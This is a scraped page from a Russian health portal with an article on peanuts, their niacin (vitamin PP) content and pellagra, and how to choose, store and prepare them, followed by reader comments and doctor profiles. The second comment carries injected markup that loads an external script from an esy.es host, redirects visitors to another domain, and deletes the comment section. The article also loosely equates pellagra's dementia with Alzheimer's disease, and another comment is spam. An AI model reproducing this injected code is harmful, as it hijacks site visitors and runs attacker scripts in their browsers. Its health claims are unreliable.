Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Арахис против слабоумия  >>  Арахис против слабоумия
 
Обратная связь
 

Арахис против слабоумия

Размер шрифта
05 марта 2012 10:00
  • google_analytics: false
  • Нравится

Почему арахис так популярен в мире? Какие бесценные пищевые свойства скрываются под скорлупой? Как правильно потреблять этот продукт, чтобы извлечь только пользу?

1 

Арахис – однолетняя бобовая культура. Вопреки распространенному мнению, арахис не орех, а семена. Археологи обнаружили следы возделывания этого растения в Перу еще во времена инков. Арахис занимает второе место (после сои)среди сельскохозяйственных культур по распространению в мире.

  • Арахис богат растительным жиром (на 50% состоит из растительных жиров).
  • Арахис – источник белка (на 30% состоит из растительных белков).
  • Арахис богат витамином PP (B3).

Витамин PP (никотиновая кислота или противопеллагрический фактор) предохраняет от пеллагры. Пеллагра – болезнь, включающая проявления деменции (болезнь Альцгеймера), диареи (понос) и дерматита (кожное воспаление). Арахис – чемпион по содержанию никотиновой кислоты (витамин PP) – 14 мг на 100 г. Для сравнения, в куриной грудке ее – 12 мг на 100 г, а в карбонате – 10 мг.

Как выбрать

  • Если неочищенный арахис гремит при тряске, значит семена внутри усохли, а сам продукт, скорее всего, залежалый. Арахис должен плотно заполнять оболочку и не греметь.
  • Если арахис продается очищенный, следует ориентироваться на его запах. Как жиросодержащий продукт, арахис при длительном хранении начинает издавать прогорклый запах.

Хранение

Растительные жиры в составе арахиса быстрее распадаются при воздействии света и высоких температур. Поэтому лучше хранить его в холодильнике (в холодильнике может храниться 3 месяца, в морозильнике – 9 месяцев).

Приготовление

Правильно готовить продукт так, чтобы полезные вещества без потерь были усвоены организмом. Распространенный в продаже обжаренный арахис для здоровья отнюдь не полезен, поскольку выпускается либо в шоколадной глазури, либо с добавлением соли.

1

Способы употребления арахиса:

  • В сыром виде
  • Слегка обжарить (без добавления масла) на сковородке
  • В виде пасты (измельчить блендером и добавить растительного масла для однородности)

Рецепт

Ореховая паста
Апельсиновое пралине
Красная смородина (в ягодах)
Клубника

 

Сюжеты по теме:
Выжать любой ценой. Как делается арахисовое масло 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 марта 2015 в 22:03

Цитировать   |   Пожаловаться

Также арахис защищает от болезни Альцгеймера и когнитивного спада.        Спортивный интернет-магазин

2 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.